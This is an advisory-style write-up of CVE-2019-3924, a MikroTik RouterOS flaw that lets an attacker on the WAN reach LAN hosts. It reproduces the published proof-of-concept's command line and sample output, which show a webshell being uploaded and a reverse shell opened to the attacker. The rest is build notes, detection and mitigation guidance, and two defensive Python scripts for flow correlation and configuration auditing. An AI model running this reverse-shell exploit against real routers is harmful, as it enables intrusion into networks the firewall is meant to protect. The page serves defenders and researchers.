CVE-2019-3924 - MikroTik RouterOS Firewall and NAT Bypass
VULNERABILITY INFO
| CATEGORY | Vulnerabilities |
| PUBLISHED | February 21, 2019 |
| AUTHOR | Jacob Baines / Exploit-DB |
| READ TIME | 5 MIN |
Remote unauthenticated proxying of traffic through MikroTik RouterOS via agent binary probes. Demonstrates WAN-to-LAN access and firewall/NAT bypass.
Vulnerability Overview
A remote, unauthenticated attacker can proxy arbitrary traffic through MikroTik RouterOS by sending specially crafted probes to the RouterOS agent binary. This permits an attacker on the WAN to reach hosts on the LAN that would normally be protected by firewall or NAT rules. The issue is tracked as CVE-2019-3924 and was demonstrated and documented in public advisories and PoC code.
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
CVE: CVE-2019-3924
Summary: The RouterOS agent responds to crafted probes in a way that allows attackers to relay connections through the router. This can be used to reach internal services from the Internet and to bypass firewall/NAT protections.
Affected Component
The issue affects MikroTik RouterOS versions prior to the stable and long-term fixes listed by vendor advisories. Affected builds include RouterOS < 6.43.12 (stable) and < 6.42.12 (long-term) as reported in public advisories.
Technical Details
The RouterOS agent listens for and responds to probes. Crafted probe sequences cause the device to proxy or forward traffic from the attacker-controlled endpoint to a target inside the LAN. The proxied traffic can be used to access management interfaces or application endpoints that should not be reachable from WAN.
The exploit leverages the agent protocol implementation to instruct the router to open outbound connections that bridge the WAN-side attacker to the internal target.
Exploitation
A remote unauthenticated attacker runs the PoC to instruct a vulnerable RouterOS instance to connect to an internal target (for example a DVR/NVR or web admin interface) and relay a shell or webshell payload. The PoC demonstrates discovery of a target service on the LAN, uploading of a webshell, and execution of a reverse shell back to the attacker.
Proof of Concept (PoC) / Exploit
The original PoC and compiled binaries were published to Exploit-DB (EDB ID: 46444). The PoC repository and binary archive are referenced in public advisories.
Example PoC usage (from included README):
./nvr_rev_shell --proxy_ip 192.168.1.70 --proxy_port 8291 --target_ip 10.0.0.252 --target_port 80 --listening_ip 192.168.1.7 --listening_port 1270
Sample console output (PoC run):
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!
Binary PoC archive (original): 46444.zip (Exploit-DB bin-sploits bundle).
Note: This section reproduces PoC usage that was part of the public disclosure.
Compilation (PoC build notes)
The PoC was tested on Ubuntu 18.04. Dependencies include Boost, CMake and the standard build tools.
Example dependency installation:
sudo apt install libboost-dev cmake build-essential
Build steps (example):
cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..
make
Sample Usage
The PoC accepts parameters for the proxy (router), the target (internal host) and the listener (attacker IP/port). The example invocation shown above targets a NUUO NVR on the LAN through the RouterOS proxy.
Impact Assessment
Critical Risks
- Firewall/NAT Bypass: External attacker can reach internal services that were intended to be inaccessible from WAN.
- Remote Service Compromise: Services exposed through the proxy may themselves be vulnerable and compromisable.
- Lateral Movement: Access to internal hosts can enable further compromise of the network.
- Data Exfiltration: Internal data may be accessed or exfiltrated.
- High Privilege Consequences: If internal services allow code execution, full system compromise may follow.
Detection Methods
Network Monitoring
- Monitor for unusual agent traffic on the RouterOS management port (e.g., TCP 8291) from untrusted sources.
- Alert on RouterOS-originated outbound connections to internal hosts that are unusual for that router.
Log Analysis
- Correlate management/proxy activity timestamps with unexpected connections to internal services.
- Search for repeated or abnormal agent-protocol probes in packet captures or netflow.
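The two patterns described under Network Monitoring and Log Analysis can be checked together: a probe of the management port from an untrusted source, followed within a short window by a router-originated connection to a LAN host. The script below is an added example, not part of the original advisory or the PoC; the flow records, addresses, the 60-second window and the trusted management range are all constructed for illustration, and the record format is a simplified NetFlow-style line rather than any particular collector's output.

```python
"""Correlate untrusted probes of the RouterOS management port with
router-originated connections into the LAN, over constructed flow records."""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed addressing for the example (not from the advisory).
ROUTER_WAN_IP = ip_address("203.0.113.10")   # router's WAN side
ROUTER_LAN_IP = ip_address("10.0.0.1")       # router's LAN side (source of proxied flows)
LAN_NETWORK = ip_network("10.0.0.0/24")
TRUSTED_MGMT = [ip_network("198.51.100.0/24")]  # ranges allowed to manage the router
MGMT_PORTS = {8291}                              # port named in the advisory
CORRELATION_WINDOW = timedelta(seconds=60)       # assumed window between probe and relay

# Constructed flow records: "timestamp src:port dst:port proto"
SAMPLE_FLOWS = """\
2019-02-21T10:00:01 198.51.100.5:50122 203.0.113.10:8291 tcp
2019-02-21T10:05:10 192.0.2.77:41000 203.0.113.10:8291 tcp
2019-02-21T10:05:12 10.0.0.1:37001 10.0.0.252:80 tcp
2019-02-21T10:05:40 10.0.0.1:37002 10.0.0.252:80 tcp
2019-02-21T10:30:00 10.0.0.1:37003 10.0.0.9:443 tcp
"""


def parse_flow(line):
    """Parse one constructed flow line into a dict of typed fields."""
    ts, src, dst, proto = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts),
            "src": ip_address(src_ip), "sport": int(src_port),
            "dst": ip_address(dst_ip), "dport": int(dst_port),
            "proto": proto}


def is_trusted(ip):
    return any(ip in net for net in TRUSTED_MGMT)


def untrusted_mgmt_probes(flows):
    """Flows from outside the trusted ranges to the router's management port."""
    return [f for f in flows
            if f["dst"] == ROUTER_WAN_IP and f["dport"] in MGMT_PORTS
            and not is_trusted(f["src"])]


def router_to_lan(flows):
    """Connections the router itself opens to hosts inside the LAN."""
    return [f for f in flows
            if f["src"] == ROUTER_LAN_IP and f["dst"] in LAN_NETWORK]


def correlate(flows):
    """Pair each router-to-LAN connection with a preceding untrusted probe."""
    probes = untrusted_mgmt_probes(flows)
    alerts = []
    for inner in router_to_lan(flows):
        for probe in probes:
            delta = inner["ts"] - probe["ts"]
            if timedelta(0) <= delta <= CORRELATION_WINDOW:
                alerts.append((str(probe["src"]), str(inner["dst"]), inner["dport"]))
                break
    return alerts


def analyse(text):
    """Return the untrusted probe sources and the relay alerts for a flow dump."""
    flows = [parse_flow(l) for l in text.splitlines() if l.strip()]
    return {"probes": [str(f["src"]) for f in untrusted_mgmt_probes(flows)],
            "relays": correlate(flows)}


if __name__ == "__main__":
    print(analyse(SAMPLE_FLOWS))
```

On the constructed input the trusted probe at 10:00:01 is ignored, the probe from 192.0.2.77 is reported, and the two router-to-LAN connections that follow it within the window are raised as relay alerts; the later connection at 10:30:00 has no preceding probe and is left alone, which is the distinction that keeps the router's own legitimate LAN traffic out of the alert stream.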
Mitigation & Remediation
Immediate Mitigations
- Restrict access to RouterOS management and agent ports on the WAN. Apply firewall rules to permit management only from trusted IPs.
- Disable unnecessary agent or management services if not required.
- Monitor for and block suspicious incoming management/agent probes.
Vendor Patch
Upgrade RouterOS to a version that contains the vendor fix. Vendor advisories indicated fixes in the 6.43.12 stable and 6.42.12 long-term branches or later releases. Confirm the exact patched release for your device model and RouterOS channel and apply vendor-provided updates.
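The Immediate Mitigations above and the version guidance in this section can both be checked against a RouterOS configuration export. The script below is an added example and not part of the original advisory or any MikroTik tooling: it parses a constructed `/export`-style text, walks the `input` chain the way an untrusted WAN source would be matched, reports whether the Winbox service is bound to a trusted range, and compares a running version with the fixed releases the advisory names. The two exports (a weak one that accepts TCP 8291 from anywhere, and a hardened one restricted to an assumed management range 198.51.100.0/24) are constructed; the matcher is deliberately simplified (it treats any `src-address` or `src-address-list` restriction as excluding an untrusted source and ignores interface matchers), so it is a review aid, not a substitute for reading the ruleset.

```python
"""Audit a constructed RouterOS export for WAN-reachable management (tcp/8291)
and compare a running version with the fixed releases named in the advisory."""
import shlex

# Constructed weak configuration: Winbox port accepted from any source.
WEAK_EXPORT = """\
/ip firewall filter
add chain=input protocol=tcp dst-port=8291 action=accept comment="winbox from anywhere"
/ip service
set winbox port=8291
"""

# Constructed hardened configuration: Winbox only from an assumed management range.
HARDENED_EXPORT = """\
/ip firewall address-list
add list=mgmt address=198.51.100.0/24
/ip firewall filter
add chain=input protocol=tcp dst-port=8291 src-address-list=mgmt action=accept comment="winbox from mgmt only"
add chain=input protocol=tcp dst-port=8291 action=drop comment="drop other winbox"
/ip service
set winbox port=8291 address=198.51.100.0/24
"""

# Fixed releases as stated in the advisory, keyed by RouterOS channel.
FIXED_VERSIONS = {"stable": (6, 43, 12), "long-term": (6, 42, 12)}


def parse_export(text):
    """Return (section, command, positional args, key=value params) per line."""
    entries, section = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # section header such as "/ip firewall filter"
            section = line
            continue
        tokens = shlex.split(line)        # shlex keeps quoted comments as one token
        cmd, positional, params = tokens[0], [], {}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                params[key] = value
            else:
                positional.append(tok)
        entries.append((section, cmd, positional, params))
    return entries


def input_verdict_for_untrusted(entries, port=8291):
    """First-match walk of the input chain for an untrusted TCP source to `port`."""
    for section, cmd, _, p in entries:
        if section != "/ip firewall filter" or cmd != "add" or p.get("chain") != "input":
            continue
        if p.get("disabled") == "yes":
            continue
        if p.get("protocol", "tcp") != "tcp":
            continue
        if "dst-port" in p and str(port) not in p["dst-port"].split(","):
            continue
        # Simplification: a source restriction is assumed to exclude untrusted sources.
        if "src-address" in p or "src-address-list" in p:
            continue
        return p.get("action", "accept")
    return "accept"   # RouterOS accepts input when no filter rule matches


def winbox_service_restricted(entries):
    """True when '/ip service set winbox' carries a non-empty address restriction."""
    for section, cmd, positional, p in entries:
        if section == "/ip service" and cmd == "set" and positional[:1] == ["winbox"]:
            return bool(p.get("address"))
    return False


def audit(text):
    """List the findings for one export; an empty list means both checks pass."""
    entries = parse_export(text)
    findings = []
    if input_verdict_for_untrusted(entries) == "accept":
        findings.append("firewall: untrusted sources reach tcp/8291 on the input chain")
    if not winbox_service_restricted(entries):
        findings.append("service: winbox is not bound to a trusted address range")
    return findings


def is_fixed(version, channel):
    """Compare a dotted RouterOS version with the advisory's fixed release for its channel."""
    return tuple(int(x) for x in version.split(".")) >= FIXED_VERSIONS[channel]


if __name__ == "__main__":
    print("weak:", audit(WEAK_EXPORT))
    print("hardened:", audit(HARDENED_EXPORT))
    print("6.43.11 stable fixed:", is_fixed("6.43.11", "stable"))
```

Run against the two constructed exports, the weak one yields both findings and the hardened one none; the version check only encodes the two releases the advisory lists, so a device on another channel still needs the vendor's release notes.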
Additional Hardening
- Apply principle of least privilege to administrative interfaces.
- Place management interfaces on dedicated management networks or VPNs.
- Enable log forwarding and centralized monitoring for anomalous management activity.
- Regularly apply RouterOS updates and review vendor security advisories.
Timeline (public disclosure)
- 2019-02-21: Public PoC and advisory material published (EDB, Tenable research advisory and related disclosures).
- Vendor advisories and patches were released following coordinated disclosure.
References
- Exploit-DB EDB ID 46444 (PoC binary archive).
- Tenable Research Advisory for CVE-2019-3924.
- Public demonstration video referenced in original disclosure: https://www.youtube.com/watch?v=CxyOtsNVgFg
Credits
Discovered / PoC Author: Jacob Baines
EDB ID: 46444
CVE: CVE-2019-3924
⚠️ DISCLAIMER: This document reproduces public exploit disclosure material and PoC usage for CVE-2019-3924. It is provided for defensive and research purposes. Use only on systems you own or are authorized to test. Unauthorized exploitation is illegal.